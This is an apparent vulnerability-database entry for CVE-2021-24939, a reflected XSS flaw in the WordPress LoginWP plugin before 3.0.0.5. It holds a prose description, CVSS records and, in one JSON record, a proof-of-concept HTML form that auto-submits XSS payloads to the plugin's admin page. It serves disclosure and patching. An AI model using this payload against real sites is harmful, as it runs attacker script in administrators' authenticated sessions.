Description
WordPress is a PHP-based blogging and publishing platform maintained by the WordPress Foundation; it runs on servers that provide PHP and MySQL. The LoginWP plugin for WordPress (formerly "Peter's Login Redirect") contains a reflected cross-site scripting vulnerability in versions prior to 3.0.0.5 (CVE-2021-24939, CWE-79). The plugin does not sanitise or escape the `rul_login_url` and `rul_logout_url` request parameters before echoing them back inside HTML attributes on its admin page (`wp-admin/admin.php?page=loginwp-redirections`). Because the vulnerable output is on a page in the WordPress admin area, exploitation requires user interaction: an attacker must get a logged-in user who can reach that page (typically an administrator) to submit a crafted request — for example via an auto-submitting form hosted on an attacker-controlled site, as in the referenced proof of concept — after which the injected JavaScript executes in the victim's browser within that user's authenticated session. The fix is to update LoginWP to version 3.0.0.5 or later.
Affected Software
Related
{"id": "CNVD-2021-95951", "vendorId": null, "type": "cnvd", "bulletinFamily": "cnvd", "title": "WordPress LoginWP plugin cross-site scripting vulnerability", "description": "WordPress is the WordPress Foundation's suite of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on servers with PHP and MySQL. WordPress LoginWP plugin has a cross-site scripting vulnerability in versions prior to 3.0.0.5, which stems from a lack of data validation filtering of user-supplied data and output. An attacker could exploit the vulnerability to execute JavaScript code on the client side.", "published": "2021-12-09T00:00:00", "modified": "2021-12-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-95951", "reporter": "China National Vulnerability Database", "references": [], "cvelist": ["CVE-2021-24939"], "immutableFields": [], "lastseen": "2022-11-05T07:59:22", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", 
"idList": ["CVE-2021-24939"]}, {"type": "patchstack", "idList": ["PATCHSTACK:F492B24FE05DEE1497854B03B608F368"]}, {"type": "wpexploit", "idList": ["WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "score": {"value": 1.7, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "wordpress loginwp plugin <3.", "version": 0}]}, "epss": [{"cve": "CVE-2021-24939", "epss": "0.000820000", "percentile": "0.333570000", "modified": "2023-03-20"}], "vulnersScore": 1.7}, "_state": {"dependencies": 1678105738, "score": 1684017570, "affected_software_major_version": 0, "epss": 1679345642}, "_internal": {"score_hash": "09b453a0c4b8448667123e23546cda40"}, "vendorCVSS": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "affectedSoftware": [{"name": "WordPress LoginWP plugin <3.", "version": "0.0.5", "operator": "eq"}]}
{"patchstack": [{"lastseen": "2022-06-01T19:28:50", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4).\n\n## Solution\n\n\r\n Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "patchstack", "title": "WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T00:00:00", "id": "PATCHSTACK:F492B24FE05DEE1497854B03B608F368", "href": "https://patchstack.com/database/vulnerability/peters-login-redirect/wordpress-loginwp-plugin-3-0-0-4-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected 
Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpvulndb", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpexploit", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1\" id=\"hack\" method=\"POST\">\r\n <input type=\"hidden\" name=\"rul_login_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />\r\n <input type=\"hidden\" name=\"rul_logout_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n <script>\r\n var form1 = document.getElementById('hack');\r\n form1.submit();\r\n</script>\r\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-05-27T14:28:31", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "cve", "title": "CVE-2021-24939", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "cpe": [], "id": "CVE-2021-24939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}